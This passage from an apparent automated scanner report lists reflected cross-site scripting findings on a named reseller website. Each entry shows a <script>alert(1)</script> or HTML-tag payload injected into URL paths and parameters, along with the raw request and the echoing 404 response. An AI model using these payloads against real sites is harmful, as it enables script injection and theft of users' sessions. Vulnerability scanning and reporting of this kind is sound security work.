The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dcc24<script>alert(1)</script>f154d9ad8f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesdcc24<script>alert(1)</script>f154d9ad8f3/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesdcc24<script>alert(1)</script>f154d9ad8f3/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3132. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb465<script>alert(1)</script>45955c185a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosbb465<script>alert(1)</script>45955c185a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosbb465<script>alert(1)</script>45955c185a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3133. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 85709<script>alert(1)</script>da0a91ac93b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images85709<script>alert(1)</script>da0a91ac93b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images85709<script>alert(1)</script>da0a91ac93b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3134. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a3cd2<script>alert(1)</script>db463e82eee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/ratinga3cd2<script>alert(1)</script>db463e82eee/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/ratinga3cd2<script>alert(1)</script>db463e82eee/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3135. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a8ff7<script>alert(1)</script>8acc77cbceb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/search.phpa8ff7<script>alert(1)</script>8acc77cbceb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.phpa8ff7<script>alert(1)</script>8acc77cbceb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3136. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 24070<a>09a29bfbb45 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search24070<a>09a29bfbb45&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search24070<a>09a29bfbb45&opt=2 was not found on this server.</p>
...[SNIP]...

2.3137. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 170cc<a>03be73899a0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...170cc<a>03be73899a0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...170cc<a>03be73899a0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3138. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0415<script>alert(1)</script>3dc1dce2d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0415<script>alert(1)</script>3dc1dce2d85=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0415<script>alert(1)</script>3dc1dce2d85=1 was not found on this server.</p>
...[SNIP]...

2.3139. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 47659<a>bc6ab7786e3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=247659<a>bc6ab7786e3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=247659<a>bc6ab7786e3 was not found on this server.</p>
...[SNIP]...

2.3140. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8566<script>alert(1)</script>0e04a47cc7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb8566<script>alert(1)</script>0e04a47cc7b/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb8566<script>alert(1)</script>0e04a47cc7b/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3141. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6d16<script>alert(1)</script>839e4cf7c54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44a6d16<script>alert(1)</script>839e4cf7c54/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44a6d16<script>alert(1)</script>839e4cf7c54/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3142. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc1c2<script>alert(1)</script>17fead9c84a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themescc1c2<script>alert(1)</script>17fead9c84a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themescc1c2<script>alert(1)</script>17fead9c84a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3143. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 520e6<script>alert(1)</script>ca1eb2f6296 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos520e6<script>alert(1)</script>ca1eb2f6296/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos520e6<script>alert(1)</script>ca1eb2f6296/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3144. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d71e3<script>alert(1)</script>b611dd79883 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/imagesd71e3<script>alert(1)</script>b611dd79883/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/imagesd71e3<script>alert(1)</script>b611dd79883/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3145. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cf97c<script>alert(1)</script>d168229a91e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/search.phpcf97c<script>alert(1)</script>d168229a91e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.phpcf97c<script>alert(1)</script>d168229a91e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3146. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 46edc<a>5b2715b103c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search46edc<a>5b2715b103c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search46edc<a>5b2715b103c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3147. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 10063<a>d1f045554f8 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...10063<a>d1f045554f8&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...10063<a>d1f045554f8&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3148. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6bdfd<script>alert(1)</script>a419029783f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6bdfd<script>alert(1)</script>a419029783f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
